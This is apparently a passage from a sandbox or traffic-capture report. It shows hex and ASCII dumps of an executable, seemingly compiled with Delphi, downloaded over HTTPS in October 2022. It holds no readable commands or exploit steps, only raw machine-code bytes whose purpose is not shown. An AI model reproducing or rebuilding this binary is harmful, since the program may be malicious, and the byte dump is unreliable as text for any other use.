                                                                                                                                                                                                                                    Data Ascii: ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC63INData Raw: 01 c4 01 c4 01 c4 01 c6 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 29 10 00 05 00 05 f7 06 b5 01 2a 0d 02 03 82 0d c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 59 0d 8d 03 ef 0a c4 01 c4 01 c4 01 c4 01 c4 01 29 0e 00 05 c4 01 c4 01 c4 01 c4 01 27 0e c4 01 c4 01 c0 04 00 05 00 05 de 0d 8b 13 64 07 8b 13 a0 08 ca 0a c0 0a 81 05 02 08 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 89 12 73 05 30 00 40 00 50 00 60 00 69 0d d6 0d a8 07 c4 01 8d 04 c4 01 c5 01 a0 01 a8 01 05 0f 73 0f 48 03 c4 01 4d 03 79 0d c6 01 c6 01 00 05 00 05 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 28 10 85 14 41 05 41 05 3e 09 08 0b 08 0b 08 0b b0 0d 99 15 13 16 69 0b 00 05 00 05 08 01 08 01 d2 08 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 c4 01 c7 01 c4 01 c4 01 c4 01 ff 04 ee 0d 45 05 c4 01 c4 01
                                                                                                                                                                                                                                    Data Ascii: )*Y)'ds0@P`isHMy(AA>iE
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC64INData Raw: 89 13 60 09 99 12 00 05 00 05 00 05 00 05 7d 0d c4 01 c4 01 a9 12 c5 12 e5 04 7e 0d c4 01 d5 12 fa 12 e5 04 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 c4 01 0a 13 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 41 05 96 14 07 01 1d 16 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 29 10 00 05 00 05 00 05 00 05 00 05 00 05 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 09 0b d3 10 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 04 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 c4 01 c4 01 c5 01 b6 11 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 c4 01 c4 01 c4 01 c4 01 c1 04 00 05 00 05 00 05 00
                                                                                                                                                                                                                                    Data Ascii: `}~A)
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC68INData Raw: 05 05 05 02 05 02 02 02 02 02 05 02 02 11 15 16 15 15 15 15 15 15 15 15 15 15 15 15 15 02 02 02 02 02 02 02 02 02 1d 15 15 15 1a 06 07 0e 16 12 16 12 16 12 16 12 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 19 19 19 16 12 02 11 06 06 06 06 06 1a 1a 0e 0e 0e 06 07 15 1a 1a 0c 0c 0c 1a 02 02 02 02 02 02 02 02 02 02 07 07 07 07 07 07 07 02 02 0c 0c 18 18 06 06 07 07 07 07 07 07 1a 1a 1a 07 0a 0c 0a 07 07 07 07 07 07 07 07 07 07 07 07 07 0f 0f 0f 0f 0f 0f 02 02 02 15 07 07 07 07 07 07 07 07 07 07 07 15 06 06 06 07 0c 07 07 0c 0c 0c 0c 0c 0c 0c 0c 0c 07 02 02 07 07 07 07 07 06 07 07 07 07 07 07 07 07 07 07 07 07 06 15 15 15 02 15 15 15 15 11 16 12 16 12 16 12 15 15 16 12 15 15 15 15 10 10 10 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 07 07 02 02 02 02 02 02 0a 02 02 02 02 02 07 07 07 07
                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC72INData Raw: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC76INData Raw: 00 b3 00 90 01 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 c0 01 00 00 d0 01 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 01 00 00 00 02 10 02 00 00 00 00 9a 01 00 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 00
                                                                                                                                                                                                                                    Data Ascii: 0@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC80INData Raw: 8b c3 e8 81 ff ff ff 04 fb 2c 05 0f 92 c0 5b c3 53 56 8b d8 0f b7 33 81 fe ff 00 00 00 77 1c a1 88 e6 4b 00 0f b6 04 30 04 fb 2c 05 72 08 2c 03 74 04 33 c0 eb 1c b0 01 5e 5b c3 8b c6 e8 46 ff ff ff 04 fb 2c 05 72 08 2c 03 74 04 33 c0 eb 02 b0 01 5e 5b c3 8d 40 00 53 56 8b d8 0f b7 33 83 fe 7f 77 0c 83 c6 d0 83 ee 0a 0f 92 c0 5e 5b c3 81 fe ff 00 00 00 77 12 a1 88 e6 4b 00 0f b6 04 30 04 f3 2c 03 0f 92 c0 eb 0e 8b c6 e8 f7 fe ff ff 04 f3 2c 03 0f 92 c0 5e 5b c3 90 ff 05 78 e6 4b 00 c3 90 1a 00 00 00 cc 7d 4b 00 58 a5 4b 00 02 00 00 00 c4 7d 4b 00 a0 a7 4b 00 02 00 00 00 bc 7d 4b 00 f8 a5 4b 00 02 00 00 00 b4 7d 4b 00 34 a5 4b 00 02 00 00 00 ac 7d 4b 00 60 a6 4b 00 02 00 00 00 a4 7d 4b 00 94 a5 4b 00 02 00 00 00 9c 7d 4b 00 88 a4 4b 00 02 00 00 00 94 7d 4b
                                                                                                                                                                                                                                    Data Ascii: ,[SV3wK0,r,t3^[F,r,t3^[@SV3w^[wK0,,^[xK}KXK}KK}KK}K4K}K`K}KK}KK}K
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC84INData Raw: 00 00 00 00 00 00 00 00 00 00 00 9c 5b 41 00 00 00 00 00 7c 5b 41 00 00 00 00 00 82 5b 41 00 20 00 00 00 54 5a 41 00 b0 5d 40 00 b8 5d 40 00 c0 f4 41 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 f0 f3 41 00 68 f4 41 00 34 f4 41 00 00 00 00 00 02 00 12 45 45 78 74 65 72 6e 61 6c 45 78 63 65 70 74 69 6f 6e 00 00 00 9c 5b 41 00 07 12 45 45 78 74 65 72 6e 61 6c 45 78 63 65 70 74 69 6f 6e 74 5b 41 00 e8 5a 41 00 00 00 0f 53 79 73 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 00 00 02 00 00 00 00 00 2c 5c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 48 5c 41 00 00 00 00 00 34 5c 41 00 00 00 00 00 3a 5c 41 00 20 00 00 00 54 5a 41 00 b0 5d 40 00 b8 5d 40 00 c0 f4 41 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00
                                                                                                                                                                                                                                    Data Ascii: [A|[A[A TZA]@]@A`@,`@0`@4`@(`@\@\@AhA4AEExternalException[AEExternalExceptiont[AZASystem.SysUtils,\AH\A4\A:\A TZA]@]@A`@,`@0`@4`@(`@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC89INData Raw: 6b 45 78 63 65 70 74 69 6f 6e b4 6b 41 00 07 15 45 4d 6f 6e 69 74 6f 72 4c 6f 63 6b 45 78 63 65 70 74 69 6f 6e 8c 6b 41 00 04 6b 41 00 00 00 0f 53 79 73 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 00 00 02 00 00 00 00 00 00 48 6c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 78 6c 41 00 00 00 00 00 50 6c 41 00 00 00 00 00 56 6c 41 00 1c 00 00 00 94 6a 41 00 b0 5d 40 00 b8 5d 40 00 c0 f4 41 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 f0 f3 41 00 68 f4 41 00 34 f4 41 00 00 00 00 00 02 00 1a 45 4e 6f 4d 6f 6e 69 74 6f 72 53 75 70 70 6f 72 74 45 78 63 65 70 74 69 6f 6e 00 00 00 78 6c 41 00 07 1a 45 4e 6f 4d 6f 6e 69 74 6f 72 53 75 70 70 6f 72 74 45 78 63 65 70 74 69 6f 6e 48 6c 41 00 04 6b 41 00 00 00 0f 53 79 73 74 65 6d
                                                                                                                                                                                                                                    Data Ascii: kExceptionkAEMonitorLockExceptionkAkASystem.SysUtilsHlAxlAPlAVlAjA]@]@A`@,`@0`@4`@(`@\@\@AhA4AENoMonitorSupportExceptionxlAENoMonitorSupportExceptionHlAkASystem
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC93INData Raw: f4 ff f7 88 41 00 42 00 f4 ff 76 89 41 00 41 00 f4 ff a5 89 41 00 41 00 f4 ff d8 89 41 00 ca 00 08 00 1a 8a 41 00 ca 00 09 00 5c 8a 41 00 ca 00 0a 00 92 8a 41 00 42 00 f4 ff d5 8a 41 00 42 00 f4 ff 3e 8b 41 00 42 00 f4 ff 0b 00 09 54 45 6e 63 6f 64 69 6e 67 25 00 8c 16 42 00 05 43 6c 6f 6e 65 03 00 84 8b 41 00 08 00 01 08 84 8b 41 00 00 00 04 53 65 6c 66 02 00 02 00 66 00 18 7c 4b 00 07 43 6f 6e 76 65 72 74 03 00 a4 31 40 00 14 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 0a 84 8b 41 00 01 00 06 53 6f 75 72 63 65 02 00 0a 84 8b 41 00 02 00 0b 44 65 73 74 69 6e 61 74 69 6f 6e 02 00 16 b4 10 40 00 10 00 05 42 79 74 65 73 02 00 40 a4 31 40 00 08 00 01 01 02 00 02 00 66 00 18 7c 4b 00 07 43 6f 6e 76 65 72 74 03 00 a4 31 40 00 10 00 05 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: ABvAAAAAA\AABAB>ABTEncoding%BCloneAASelff|KConvert1@SelfASourceADestination@Bytes@1@f|KConvert1@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC96INData Raw: 00 9c 10 40 00 1c 00 06 08 84 8b 41 00 00 00 04 53 65 6c 66 02 00 16 b4 10 40 00 01 00 05 42 79 74 65 73 02 00 00 9c 10 40 00 18 00 09 42 79 74 65 49 6e 64 65 78 02 00 00 9c 10 40 00 14 00 09 42 79 74 65 43 6f 75 6e 74 02 00 16 4c 10 40 00 10 00 05 43 68 61 72 73 02 00 00 9c 10 40 00 08 00 09 43 68 61 72 49 6e 64 65 78 02 00 02 00 7f 00 18 7c 4b 00 08 47 65 74 43 68 61 72 73 03 00 9c 10 40 00 14 00 06 08 84 8b 41 00 00 00 04 53 65 6c 66 02 00 02 a4 31 40 00 01 00 05 42 79 74 65 73 02 00 00 9c 10 40 00 02 00 09 42 79 74 65 49 6e 64 65 78 02 00 00 9c 10 40 00 10 00 09 42 79 74 65 43 6f 75 6e 74 02 00 02 dc 31 40 00 0c 00 05 43 68 61 72 73 02 00 00 9c 10 40 00 08 00 09 43 68 61 72 49 6e 64 65 78 02 00 02 00 2f 00 18 7c 4b 00 0b 47 65 74 45 6e 63 6f 64 69 6e
                                                                                                                                                                                                                                    Data Ascii: @ASelf@Bytes@ByteIndex@ByteCountL@Chars@CharIndex|KGetChars@ASelf1@Bytes@ByteIndex@ByteCount1@Chars@CharIndex/|KGetEncodin
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC100INData Raw: 06 e8 51 b1 ff ff 84 c0 75 0c 66 83 7c 24 06 5f 74 04 33 c0 eb 02 b0 01 34 01 84 c0 0f 85 a9 00 00 00 80 7c 24 04 00 74 57 8b 04 24 85 c0 74 05 83 e8 04 8b 00 8b f8 83 ef 02 0f 8c 89 00 00 00 47 be 02 00 00 00 8b 04 24 0f b7 44 70 fe 66 89 44 24 08 8d 44 24 08 e8 43 b1 ff ff 84 c0 75 14 66 83 7c 24 08 5f 74 0c 66 83 7c 24 08 2e 74 04 33 c0 eb 02 b0 01 84 c0 74 51 46 4f 75 c8 eb 49 8b 04 24 85 c0 74 05 83 e8 04 8b 00 8b f8 83 ef 02 7c 36 47 be 02 00 00 00 8b 04 24 0f b7 44 70 fe 66 89 44 24 0a 8d 44 24 0a e8 f0 b0 ff ff 84 c0 75 0c 66 83 7c 24 0a 5f 74 04 33 c0 eb 02 b0 01 84 c0 74 06 46 4f 75 d0 b3 01 8b c3 83 c4 0c 5f 5e 5b c3 8d 40 00 53 56 57 55 8b e9 8b da 8b f8 81 ff 10 27 00 00 72 49 81 ff 40 42 0f 00 72 2e 81 ff 00 e1 f5 05 72 13 81 ff 00 ca 9a 3b
                                                                                                                                                                                                                                    Data Ascii: Quf|$_t34|$tW$tG$DpfD$D$Cuf|$_tf|$.t3tQFOuI$t|6G$DpfD$D$uf|$_t3tFOu_^[@SVWU'rI@Br.r;
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC104INData Raw: ce dc fe ff eb 10 8d 95 f4 df ff ff 8b c7 8b 4d f4 e8 00 d2 fe ff 5f 5e 5b 8b e5 5d c2 08 00 8d 40 00 55 8b ec 53 56 33 c9 8b 5d 08 3b 43 fc 7d 10 8b 5d 08 66 83 7b fa 53 74 06 8b 45 08 8b 40 fc 8b 5d 08 83 7b f4 ff 74 45 8b 5d 08 8b 5b f4 8d 34 02 3b de 7e 38 8d 54 02 01 8b 45 08 8b 40 f4 2b c2 7c 2a 40 8b 5d 08 83 7b f0 00 75 04 b1 01 eb 1c 8b 55 08 8b 52 ec 66 c7 02 20 00 8b 55 08 83 42 ec 02 8b 55 08 83 6a f0 02 48 75 d7 8b c1 5e 5b 5d c3 90 55 8b ec 83 c4 f0 53 56 57 89 4d fc 8b da 8b f8 89 7d f4 85 ff 74 17 83 7d fc ff 75 0c 8b 45 f4 e8 b7 d4 fe ff 8b f0 eb 07 8b 75 fc eb 02 33 f6 83 fb ff 7e 06 3b de 7d 02 8b f3 8b c6 03 c0 89 45 f8 85 ff 74 21 8b 45 f4 66 83 38 2d 75 18 8b 45 08 66 83 78 fa 53 74 0e 83 6d f8 02 4e c7 45 f0 01 00 00 00 eb 05 33 c0
                                                                                                                                                                                                                                    Data Ascii: M_^[]@USV3];C}]f{StE@]{tE][4;~8TE@+|*@]{uURf UBUjHu^[]USVWM}t}uEu3~;}Et!Ef8-uEfxStmNE3
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC108INData Raw: 00 75 09 81 7e 04 00 00 00 80 74 03 40 31 d2 c6 43 03 00 e9 cd 00 00 00 db 2e 2d ff 3f 00 00 69 c0 10 4d 00 00 c1 f8 10 40 89 45 f8 b8 12 00 00 00 2b 45 f8 d9 e1 53 8b 5d fc e8 ce 9f fe ff 5b d9 fc 8b 7d fc db af 90 91 4b 00 d8 d9 9b dd 7d f6 9b 66 f7 45 f6 00 41 74 09 da b7 9c 91 4b 00 ff 45 f8 df 75 ec 8d 7b 03 ba 09 00 00 00 9b 8a 44 2a eb 88 c4 c0 e8 04 80 e4 0f 66 05 30 30 66 ab 4a 75 eb 32 c0 aa 8b 7d f8 03 7d 08 79 07 31 c0 e9 77 ff ff ff 3b 7d 0c 72 03 8b 7d 0c 83 ff 12 73 27 80 7c 3b 03 35 72 25 c6 44 3b 03 00 4f 78 0d fe 44 3b 03 80 7c 3b 03 39 77 ed eb 1f 66 c7 43 03 31 00 ff 45 f8 eb 14 bf 12 00 00 00 c6 44 3b 03 00 4f 78 19 80 7c 3b 03 30 74 f1 66 8b 56 08 8b 45 f8 66 c1 ea 0f 66 89 03 88 53 02 c3 31 d2 eb ee 0a 00 00 00 64 00 00 00 e8 03 00
                                                                                                                                                                                                                                    Data Ascii: u~t@1C.-?iM@E+ES][}K}fEAtKEu{D*f00fJu2}}y1w;}r}s'|;5r%D;OxD;|;9wfC1ED;Ox|;0tfVEffS1d
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC112INData Raw: 43 06 00 00 55 e8 c2 fa ff ff 59 55 e8 ef fa ff ff 59 8b 45 08 50 55 8d 55 d0 8b 45 e4 e8 d2 fc ff ff 59 8b 45 d0 e8 39 fa ff ff 59 e9 16 06 00 00 55 e8 95 fa ff ff 59 55 e8 c2 fa ff ff 59 8b 45 e4 48 83 e8 02 72 04 74 18 eb 36 8b 45 08 50 0f b7 45 fc 8b 55 e4 e8 24 fa ff ff 59 e9 e5 05 00 00 8b 45 08 50 0f b7 45 fc 8b 55 08 8b 92 30 fd ff ff 8b 44 82 20 e8 e8 f9 ff ff 59 e9 c5 05 00 00 8b 45 08 50 0f b7 45 fc 8b 55 08 8b 92 30 fd ff ff 8b 44 82 50 e8 c8 f9 ff ff 59 e9 a5 05 00 00 55 e8 24 fa ff ff 59 8b 45 e4 48 83 e8 02 72 11 74 2c 48 74 59 48 0f 84 82 00 00 00 e9 98 00 00 00 55 e8 37 fa ff ff 59 8b 45 08 50 0f b7 45 fa 8b 55 e4 e8 a6 f9 ff ff 59 e9 67 05 00 00 8b 45 08 50 8b 45 08 ff 70 0c ff 70 08 e8 d2 f7 ff ff 0f b7 c0 8b 55 08 8b 92 30 fd ff ff 8b
                                                                                                                                                                                                                                    Data Ascii: CUYUYEPUUEYE9YUYUYEHrt6EPEU$YEPEU0D YEPEU0DPYU$YEHrt,HtYHU7YEPEUYgEPEppU0
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC116INData Raw: b9 c4 dc 41 00 8b c3 e8 d3 f8 ff ff 84 c0 74 05 bf 0c 00 00 00 85 ff 7c 09 8b d6 8b c3 e8 01 f8 ff ff 8d 45 f1 50 8d 4d f8 8b d6 8b c3 e8 15 f8 ff ff 84 c0 0f 84 39 01 00 00 66 c7 45 f6 00 00 66 c7 45 f4 00 00 66 c7 45 f2 00 00 8b 4d 08 0f b7 49 08 8b d6 8b c3 e8 67 f9 ff ff 84 c0 74 73 8d 45 f1 50 8d 4d f6 8b d6 8b c3 e8 d7 f7 ff ff 84 c0 0f 84 fb 00 00 00 8b 4d 08 0f b7 49 08 8b d6 8b c3 e8 3b f9 ff ff 84 c0 74 47 8d 45 f1 50 8d 4d f4 8b d6 8b c3 e8 ab f7 ff ff 84 c0 0f 84 cf 00 00 00 8b 4d 08 0f b7 89 c2 00 00 00 8b d6 8b c3 e8 0c f9 ff ff 84 c0 74 18 8d 45 f1 50 8d 4d f2 8b d6 8b c3 e8 7c f7 ff ff 84 c0 0f 84 a0 00 00 00 85 ff 7d 53 8b 4d 08 8b 49 14 8b d6 8b c3 e8 f9 f7 ff ff 84 c0 75 12 8b d6 b9 b0 dc 41 00 8b c3 e8 e7 f7 ff ff 84 c0 74 04 33 ff eb
                                                                                                                                                                                                                                    Data Ascii: At|EPM9fEfEfEMIgtsEPMMI;tGEPMMtEPM|}SMIuAt3
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC121INData Raw: 74 49 eb 34 8b 45 fc 8b 55 f4 0f b7 74 50 fe 8b c6 66 83 e8 47 74 1e 66 83 e8 20 74 18 8d 45 e8 8b d6 e8 43 99 fe ff 8b 55 e8 8b 45 08 e8 0c 9b fe ff 8b 45 08 ff 45 f4 8b 5d fc 85 db 74 05 83 eb 04 8b 1b 3b 5d f4 7d bb eb 0b 8b 45 08 8b 55 fc e8 04 92 fe ff 55 8b 45 08 e8 cf fe ff ff 59 e9 8c 01 00 00 8b 45 fc 8b 55 f4 0f b7 74 50 fe 66 81 fe 00 d8 72 7c 66 81 fe ff df 77 75 8b 55 f4 8b 45 fc e8 21 17 00 00 d1 f8 79 03 83 d0 00 89 45 f0 33 c0 55 68 87 ec 41 00 64 ff 30 64 89 20 8d 45 f8 e8 d1 8d fe ff 8d 45 f8 50 8b 55 f4 4a 42 8b 4d f0 8b 45 fc e8 49 9c fe ff 8b 45 08 8b 55 f8 e8 76 9a fe ff 8b 45 08 33 c0 5a 59 59 64 89 10 68 8e ec 41 00 8d 45 f8 e8 9a 8d fe ff c3 e9 b0 83 fe ff eb f0 8b 45 f0 01 45 f4 e9 df 00 00 00 6a 00 6a 02 6a 01 8b 7d f4 4f 8b d7
                                                                                                                                                                                                                                    Data Ascii: tI4EUtPfGtf tECUEEE]t;]}EUUEYEUtPfr|fwuUE!yE3UhAd0d EEPUJBMEIEUvE3ZYYdhAEEEjjj}O
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC125INData Raw: f6 33 d2 bb f4 e7 4b 00 83 3b 00 75 2a 33 c0 b9 01 00 00 00 f0 0f b1 0b 85 c0 75 1b 83 7b 04 00 75 10 6a 00 6a 00 6a 00 6a 00 e8 66 e4 fe ff 89 43 04 8b 73 04 eb 22 42 83 c3 08 83 fa 20 75 c8 85 f6 75 0f 6a 00 6a 00 6a 00 6a 00 e8 44 e4 fe ff 8b f0 56 e8 9c e6 fe ff 8b c6 5e 5b c3 8d 40 00 b9 20 00 00 00 ba f8 e7 4b 00 3b 02 75 07 33 c0 f0 87 42 fc c3 83 c2 08 49 75 ef 50 e8 e3 e3 fe ff c3 8b c0 53 b8 f0 e7 4b 00 e8 51 ff ff ff 85 c0 74 15 8b 58 04 33 d2 89 50 04 ba f4 e8 4b 00 92 e8 26 ff ff ff eb 0f 6a 00 6a 00 6a 00 6a 00 e8 df e3 fe ff 8b d8 53 e8 37 e6 fe ff 8b c3 5b c3 8d 40 00 53 8b d8 b8 f4 e8 4b 00 e8 0f ff ff ff 85 c0 75 0a b8 08 00 00 00 e8 e5 56 fe ff 89 58 04 ba f0 e7 4b 00 92 e8 df fe ff ff 5b c3 90 53 85 c0 74 0e 85 d2 75 0a 33 db 50 e8 13
                                                                                                                                                                                                                                    Data Ascii: 3K;u*3u{ujjjjfCs"B uujjjjDV^[@ K;u3BIuPSKQtX3PK&jjjjS7[@SKuVXK[Stu3P
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC128INData Raw: 74 72 79 3e 18 00 00 00 00 00 00 00 ff ff ff ff 6c 07 42 00 06 53 79 73 74 65 6d 6c 07 42 00 02 00 8d 40 00 53 56 57 55 81 c4 f8 fd ff ff 8b d8 8b c3 e8 31 76 fe ff 8b e8 55 6a 00 6a 00 8b cb 33 d2 b8 e9 fd 00 00 e8 b0 c1 fe ff 8b f8 81 ff 04 01 00 00 76 0d 8b c7 03 c0 e8 09 4b fe ff 8b f0 eb 02 8b f4 55 56 57 8b cb 33 d2 b8 e9 fd 00 00 e8 86 c1 fe ff 56 e8 ec da fe ff 33 db 8b c7 48 85 c0 7c 19 40 33 d2 8b cb c1 e1 05 c1 eb 1b 0b cb 8b d9 0f b7 0c 56 33 d9 42 48 75 ea 8b c4 3b f0 74 07 8b c6 e8 d9 4a fe ff 8b c3 81 c4 08 02 00 00 5d 5f 5e 5b c3 56 53 89 c6 31 c0 56 c1 c0 05 8a 1e f6 c3 80 75 1b 80 fb 00 74 12 80 fb 41 7c 08 80 fb 5a 7f 03 80 cb 20 32 c3 46 eb df 59 5b 5e c3 58 5b 5e e9 38 ff ff ff c3 8d 40 00 53 8b 1d 00 a7 4b 00 8b 1b 85 db 74 1f 83 7b
                                                                                                                                                                                                                                    Data Ascii: try>lBSystemlB@SVWU1vUjj3vKUVW3V3H|@3V3BHu;tJ]_^[VS1VutA|Z 2FY[^X[^8@SKt{
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC132INData Raw: 8b d0 8b 45 ec 03 c0 03 d0 8b cb 8b 45 fc 8b 38 ff 17 8b 55 f0 2b d6 3b c2 7e 17 8b 0d a4 a4 4b 00 b2 01 a1 58 79 41 00 e8 e6 d9 ff ff e8 dd 57 fe ff 8b 45 10 03 c6 50 8b 45 f0 2b c6 50 8b 45 f8 e8 99 6b fe ff 8b d0 8b 45 ec 03 c0 03 d0 8b cb 8b 45 fc 8b 18 ff 53 04 5f 5e 5b 8b e5 5d c2 10 00 90 55 8b ec 83 c4 f4 53 89 4d fc 8b 5d 08 85 d2 75 1b 85 db 74 17 8b 0d 20 a5 4b 00 b2 01 a1 58 79 41 00 e8 89 d9 ff ff e8 80 57 fe ff 83 7d fc 00 7d 27 8b 45 fc 89 45 f4 c6 45 f8 00 8d 45 f4 50 6a 00 8b 0d b4 a5 4b 00 b2 01 a1 58 79 41 00 e8 98 d9 ff ff e8 53 57 fe ff 85 db 7d 24 89 5d f4 c6 45 f8 00 8d 45 f4 50 6a 00 8b 0d a0 a5 4b 00 b2 01 a1 58 79 41 00 e8 70 d9 ff ff e8 2b 57 fe ff 8b ca 85 c9 74 05 83 e9 04 8b 09 2b 4d fc 3b d9 7e 24 89 5d f4 c6 45 f8 00 8d 45
                                                                                                                                                                                                                                    Data Ascii: EE8U+;~KXyAWEPE+PEkEES_^[]USM]ut KXyAW}}'EEEEPjKXyASW}$]EEPjKXyAp+Wt+M;~$]EE
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC136INData Raw: 8d 14 43 8b c3 e8 04 00 00 00 5b c3 8b c0 3b c2 73 03 83 ea 02 8b c2 c3 8b c0 53 56 57 55 8b ea 8b f0 b2 01 8b c6 e8 8f fd ff ff 8b f8 8b c6 85 c0 74 05 83 e8 04 8b 00 8b d8 eb 01 4b 3b fb 7d 16 8d 14 5e 8b c6 e8 c3 ff ff ff 0f b7 00 e8 cf fc ff ff 84 c0 75 e5 8b c6 85 c0 74 05 83 e8 04 8b 00 3b c3 75 0b 8b c5 8b d6 e8 ff 53 fe ff eb 0f 55 8b cb ba 01 00 00 00 8b c6 e8 9a 5e fe ff 5d 5f 5e 5b c3 90 55 8b ec 6a 00 53 8b d8 33 c0 55 68 5e 2a 42 00 64 ff 30 64 89 20 8d 55 fc 8b c3 e8 74 ff ff ff 8b 45 fc e8 ac 5a fe ff 50 e8 1a b7 fe ff 8b d8 33 c0 5a 59 59 64 89 10 68 65 2a 42 00 8d 45 fc e8 c3 4f fe ff c3 e9 d9 45 fe ff eb f0 8b c3 5b 59 5d c3 90 e8 a7 ff ff ff 83 f8 ff 74 04 a8 10 75 03 33 c0 c3 b0 01 c3 53 8b d8 8b c3 e8 8e ff ff ff 40 0f 95 c0 5b c3 53
                                                                                                                                                                                                                                    Data Ascii: C[;sSVWUtK;}^ut;uSU^]_^[UjS3Uh^*Bd0d UtEZP3ZYYdhe*BEOE[Y]tu3S@[S
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC140INData Raw: 53 65 6c 66 02 00 02 00 28 00 d8 3e 42 00 08 54 72 75 6e 63 61 74 65 03 00 00 00 00 00 08 00 01 08 94 3a 42 00 00 00 04 53 65 6c 66 02 00 02 00 4a 00 f4 3e 42 00 0b 57 72 69 74 65 42 75 66 66 65 72 03 00 00 00 00 00 08 00 03 08 94 3a 42 00 00 00 04 53 65 6c 66 02 00 02 00 00 00 00 01 00 06 42 75 66 66 65 72 02 00 00 e4 10 40 00 02 00 05 43 6f 75 6e 74 02 00 02 00 00 00 00 98 3a 42 00 07 05 54 46 69 6c 65 fc 37 42 00 f8 36 42 00 00 00 09 46 69 6c 65 43 6c 61 73 73 00 00 01 00 02 c2 3a 42 00 02 00 02 00 00 00 70 11 40 00 04 00 00 ff 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 06 48 61 6e 64 6c 65 00 3c 3b 42 00 00 00 00 00 00 00 00 00 00 00 00 00 78 3b 42 00 44 3b 42 00 62 